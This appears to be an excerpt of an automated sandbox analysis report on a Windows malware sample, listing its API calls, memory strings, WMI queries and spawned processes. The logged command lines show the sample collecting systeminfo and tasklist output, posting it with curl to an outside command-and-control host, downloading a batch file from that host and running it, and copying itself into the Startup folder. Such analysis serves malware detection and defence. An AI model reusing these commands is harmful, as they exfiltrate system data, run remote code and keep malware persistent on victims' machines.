Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0024D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, | 0_2_0024D3A9 |
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0024DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose, | 0_2_0024DBBE |
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0021C2A2 FindFirstFileExW, | 0_2_0021C2A2 |
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_002568EE FindFirstFileW,FindClose, | 0_2_002568EE |
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0025698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime, | 0_2_0025698F |
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0024D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, | 0_2_0024D076 |
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00259642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, | 0_2_00259642 |
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0025979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, | 0_2_0025979D |
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00259B2B FindFirstFileW,Sleep,FindNextFileW,FindClose, | 0_2_00259B2B |
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00255C97 FindFirstFileW,FindNextFileW,FindClose, | 0_2_00255C97 |
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe | Code function: 20_2_005AD3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, | 20_2_005AD3A9 |
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe | Code function: 20_2_005ADBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose, | 20_2_005ADBBE |
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe | Code function: 20_2_0057C2A2 FindFirstFileExW, | 20_2_0057C2A2 |
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe | Code function: 20_2_005B68EE FindFirstFileW,FindClose, | 20_2_005B68EE |
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe | Code function: 20_2_005B698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime, | 20_2_005B698F |
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe | Code function: 20_2_005AD076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, | 20_2_005AD076 |
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe | Code function: 20_2_005B9642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, | 20_2_005B9642 |
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe | Code function: 20_2_005B979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, | 20_2_005B979D |
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe | Code function: 20_2_005B9B2B FindFirstFileW,Sleep,FindNextFileW,FindClose, | 20_2_005B9B2B |
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe | Code function: 20_2_005B5C97 FindFirstFileW,FindNextFileW,FindClose, | 20_2_005B5C97 |
Source: curl.exe, 00000021.00000002.2481616714.0000000003318000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://peerhost59mj7i6macla65r.com/search/ |
Source: file.exe, 00000000.00000002.3389486145.0000000001048000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://peerhost59mj7i6macla65r.com/search/% |
Source: curl.exe, 00000011.00000002.2301039187.00000000032A9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://peerhost59mj7i6macla65r.com/search/-- |
Source: curl.exe, 00000007.00000002.2209174796.0000000003078000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://peerhost59mj7i6macla65r.com/search/44 |
Source: curl.exe, 0000000C.00000002.2275900755.0000000003328000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://peerhost59mj7i6macla65r.com/search/5iu |
Source: curl.exe, 00000019.00000002.2404181964.00000000030D7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://peerhost59mj7i6macla65r.com/search/7 |
Source: file.exe, 00000014.00000003.2377965624.00000000016F6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://peerhost59mj7i6macla65r.com/search/735C417070446174615C526F616D696E675C4D6963726F736F66745C5 |
Source: file.exe, 00000000.00000003.2211257605.00000000010F6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2277109701.0000000001176000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://peerhost59mj7i6macla65r.com/search/735C4465736B746F705C66696C652E657865 |
Source: curl.exe, 0000001D.00000002.2454822807.0000000003738000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://peerhost59mj7i6macla65r.com/search/::z |
Source: curl.exe, 0000000C.00000002.2275811158.00000000032E8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://peerhost59mj7i6macla65r.com/search/; |
Source: curl.exe, 0000000C.00000002.2275900755.0000000003328000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://peerhost59mj7i6macla65r.com/search/Bi |
Source: curl.exe, 0000001D.00000002.2454822807.0000000003738000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://peerhost59mj7i6macla65r.com/search/E-H |
Source: curl.exe, 00000007.00000002.2209174796.0000000003078000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://peerhost59mj7i6macla65r.com/search/H |
Source: curl.exe, 0000001D.00000002.2454822807.0000000003738000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://peerhost59mj7i6macla65r.com/search/K |
Source: curl.exe, 00000009.00000002.2244193304.0000000003058000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://peerhost59mj7i6macla65r.com/search/T |
Source: curl.exe, 00000009.00000002.2244193304.0000000003058000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://peerhost59mj7i6macla65r.com/search/Ti |
Source: curl.exe, 0000001B.00000002.2429620320.00000000008F7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://peerhost59mj7i6macla65r.com/search/W |
Source: curl.exe, 0000001B.00000002.2429446057.00000000008B9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://peerhost59mj7i6macla65r.com/search/bB |
Source: curl.exe, 00000021.00000002.2481616714.0000000003318000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://peerhost59mj7i6macla65r.com/search/c |
Source: curl.exe, 00000009.00000002.2244193304.0000000003058000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://peerhost59mj7i6macla65r.com/search/cb |
Source: curl.exe, 00000007.00000002.2209174796.0000000003078000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000011.00000002.2301039187.00000000032A9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://peerhost59mj7i6macla65r.com/search/cur32.dll |
Source: curl.exe, 0000001D.00000003.2454254677.0000000003778000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000001D.00000002.2454940776.0000000003778000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://peerhost59mj7i6macla65r.com/search/g_ |
Source: curl.exe, 0000000C.00000002.2275811158.00000000032E8000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000001B.00000002.2429446057.00000000008B9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://peerhost59mj7i6macla65r.com/search/n64; |
Source: curl.exe, 0000001D.00000003.2454254677.0000000003778000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000001D.00000002.2454940776.0000000003778000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://peerhost59mj7i6macla65r.com/search/ow- |
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00279576 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW, | 0_2_00279576 |
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe | Code function: 20_2_005D9576 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW, | 20_2_005D9576 |
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00252046 | 0_2_00252046 |
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_001E8060 | 0_2_001E8060 |
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00248298 | 0_2_00248298 |
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0021E4FF | 0_2_0021E4FF |
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0021676B | 0_2_0021676B |
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00274873 | 0_2_00274873 |
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0020CAA0 | 0_2_0020CAA0 |
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_001ECAF0 | 0_2_001ECAF0 |
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_001FCC39 | 0_2_001FCC39 |
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00216DD9 | 0_2_00216DD9 |
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_001FB119 | 0_2_001FB119 |
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_001E91C0 | 0_2_001E91C0 |
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00201394 | 0_2_00201394 |
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00201706 | 0_2_00201706 |
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0020781B | 0_2_0020781B |
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_001E7920 | 0_2_001E7920 |
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_001F997D | 0_2_001F997D |
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_002019B0 | 0_2_002019B0 |
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00207A4A | 0_2_00207A4A |
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00201C77 | 0_2_00201C77 |
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00207CA7 | 0_2_00207CA7 |
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0026BE44 | 0_2_0026BE44 |
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00219EEE | 0_2_00219EEE |
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00201F32 | 0_2_00201F32 |
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_001EBF40 | 0_2_001EBF40 |
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe | Code function: 20_2_005B2046 | 20_2_005B2046 |
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe | Code function: 20_2_00548060 | 20_2_00548060 |
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe | Code function: 20_2_005A8298 | 20_2_005A8298 |
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe | Code function: 20_2_0057E4FF | 20_2_0057E4FF |
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe | Code function: 20_2_0057676B | 20_2_0057676B |
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe | Code function: 20_2_005D4873 | 20_2_005D4873 |
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe | Code function: 20_2_0054CAF0 | 20_2_0054CAF0 |
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe | Code function: 20_2_0056CAA0 | 20_2_0056CAA0 |
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe | Code function: 20_2_0055CC39 | 20_2_0055CC39 |
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe | Code function: 20_2_00576DD9 | 20_2_00576DD9 |
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe | Code function: 20_2_0055B119 | 20_2_0055B119 |
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe | Code function: 20_2_005491C0 | 20_2_005491C0 |
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe | Code function: 20_2_00561394 | 20_2_00561394 |
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe | Code function: 20_2_00561706 | 20_2_00561706 |
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe | Code function: 20_2_0056781B | 20_2_0056781B |
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe | Code function: 20_2_0055997D | 20_2_0055997D |
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe | Code function: 20_2_00547920 | 20_2_00547920 |
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe | Code function: 20_2_005619B0 | 20_2_005619B0 |
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe | Code function: 20_2_00567A4A | 20_2_00567A4A |
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe | Code function: 20_2_00561C77 | 20_2_00561C77 |
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe | Code function: 20_2_00567CA7 | 20_2_00567CA7 |
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe | Code function: 20_2_005CBE44 | 20_2_005CBE44 |
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe | Code function: 20_2_00579EEE | 20_2_00579EEE |
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe | Code function: 20_2_0054BF40 | 20_2_0054BF40 |
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe | Code function: 20_2_00561F32 | 20_2_00561F32 |
Source: C:\Windows\SysWOW64\systeminfo.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor |
Source: C:\Windows\SysWOW64\systeminfo.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor |
Source: C:\Windows\SysWOW64\tasklist.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process |
Source: C:\Windows\SysWOW64\tasklist.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor |
Source: C:\Windows\SysWOW64\tasklist.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor |
Source: C:\Windows\SysWOW64\systeminfo.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process |
Source: C:\Windows\SysWOW64\systeminfo.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor |
Source: C:\Windows\SysWOW64\systeminfo.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor |
Source: C:\Windows\SysWOW64\tasklist.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process |
Source: C:\Windows\System32\conhost.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process |
Source: C:\Windows\System32\conhost.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor |
Source: C:\Windows\System32\conhost.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor |
Source: C:\Windows\System32\conhost.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process |
Source: C:\Windows\System32\conhost.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor |
Source: C:\Windows\System32\conhost.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor |
Source: unknown | Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe" | |
Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c systeminfo > tmp.txt && tasklist >> tmp.txt | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\systeminfo.exe systeminfo | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist | |
Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\SysWOW64\curl.exe curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C616C666F6E735C4465736B746F705C66696C652E657865" -X POST -H "X-Auth: 2F414C464F4E532D50432F616C666F6E732F32" -H "X-Sec-Id: 0" --data-binary @"C:\Users\user\AppData\Local\Temp\tmp.txt" "https://peerhost59mj7i6macla65r.com/search/" | |
Source: C:\Windows\SysWOW64\curl.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\SysWOW64\curl.exe curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C616C666F6E735C4465736B746F705C66696C652E657865" -H "X-Auth: 2F414C464F4E532D50432F616C666F6E732F32" -H "X-Sec-Id: 3" -Lo "C:\Users\user\AppData\Local\Temp\tmp.ini" "https://peerhost59mj7i6macla65r.com/search/" | |
Source: C:\Windows\SysWOW64\curl.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c type "C:\Users\user\Desktop\file.exe" > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe" | |
Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\SysWOW64\curl.exe curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C616C666F6E735C4465736B746F705C66696C652E657865" -H "X-Auth: 2F414C464F4E532D50432F616C666F6E732F32" -Lo "C:\Users\user\AppData\Local\Temp\tmp.bat" "https://peerhost59mj7i6macla65r.com/search/" | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
Source: C:\Windows\SysWOW64\curl.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c "C:\Users\user\AppData\Local\Temp\tmp.bat" > C:\Users\user\AppData\Local\Temp\tmp.txt | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\SysWOW64\curl.exe curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C616C666F6E735C4465736B746F705C66696C652E657865" -X POST -H "X-Auth: 2F414C464F4E532D50432F616C666F6E732F32" -H "X-Sec-Id: 1" --data-binary @"C:\Users\user\AppData\Local\Temp\tmp.txt" "https://peerhost59mj7i6macla65r.com/search/" | |
Source: C:\Windows\SysWOW64\curl.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
Source: unknown | Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe" | |
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c systeminfo > tmp.txt && tasklist >> tmp.txt | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\systeminfo.exe systeminfo | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist | |
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe | Process created: C:\Windows\SysWOW64\curl.exe curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C616C666F6E735C417070446174615C526F616D696E675C4D6963726F736F66745C57696E646F77735C5374617274204D656E755C50726F6772616D735C537461727475705C66696C652E657865" -X POST -H "X-Auth: 2F414C464F4E532D50432F616C666F6E732F32" -H "X-Sec-Id: 0" --data-binary @"C:\Users\user\AppData\Local\Temp\tmp.txt" "https://peerhost59mj7i6macla65r.com/search/" | |
Source: C:\Windows\System32\conhost.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe | Process created: C:\Windows\SysWOW64\curl.exe curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C616C666F6E735C417070446174615C526F616D696E675C4D6963726F736F66745C57696E646F77735C5374617274204D656E755C50726F6772616D735C537461727475705C66696C652E657865" -H "X-Auth: 2F414C464F4E532D50432F616C666F6E732F32" -H "X-Sec-Id: 3" -Lo "C:\Users\user\AppData\Local\Temp\tmp.ini" "https://peerhost59mj7i6macla65r.com/search/" | |
Source: C:\Windows\SysWOW64\curl.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe | Process created: C:\Windows\SysWOW64\curl.exe curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C616C666F6E735C417070446174615C526F616D696E675C4D6963726F736F66745C57696E646F77735C5374617274204D656E755C50726F6772616D735C537461727475705C66696C652E657865" -H "X-Auth: 2F414C464F4E532D50432F616C666F6E732F32" -Lo "C:\Users\user\AppData\Local\Temp\tmp.bat" "https://peerhost59mj7i6macla65r.com/search/" | |
Source: C:\Windows\SysWOW64\curl.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c "C:\Users\user\AppData\Local\Temp\tmp.bat" > C:\Users\user\AppData\Local\Temp\tmp.txt | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe | Process created: C:\Windows\SysWOW64\curl.exe curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C616C666F6E735C417070446174615C526F616D696E675C4D6963726F736F66745C57696E646F77735C5374617274204D656E755C50726F6772616D735C537461727475705C66696C652E657865" -X POST -H "X-Auth: 2F414C464F4E532D50432F616C666F6E732F32" -H "X-Sec-Id: 1" --data-binary @"C:\Users\user\AppData\Local\Temp\tmp.txt" "https://peerhost59mj7i6macla65r.com/search/" | |
Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c systeminfo > tmp.txt && tasklist >> tmp.txt | Jump to behavior |
Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\SysWOW64\curl.exe curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C616C666F6E735C4465736B746F705C66696C652E657865" -X POST -H "X-Auth: 2F414C464F4E532D50432F616C666F6E732F32" -H "X-Sec-Id: 0" --data-binary @"C:\Users\user\AppData\Local\Temp\tmp.txt" "https://peerhost59mj7i6macla65r.com/search/" | Jump to behavior |
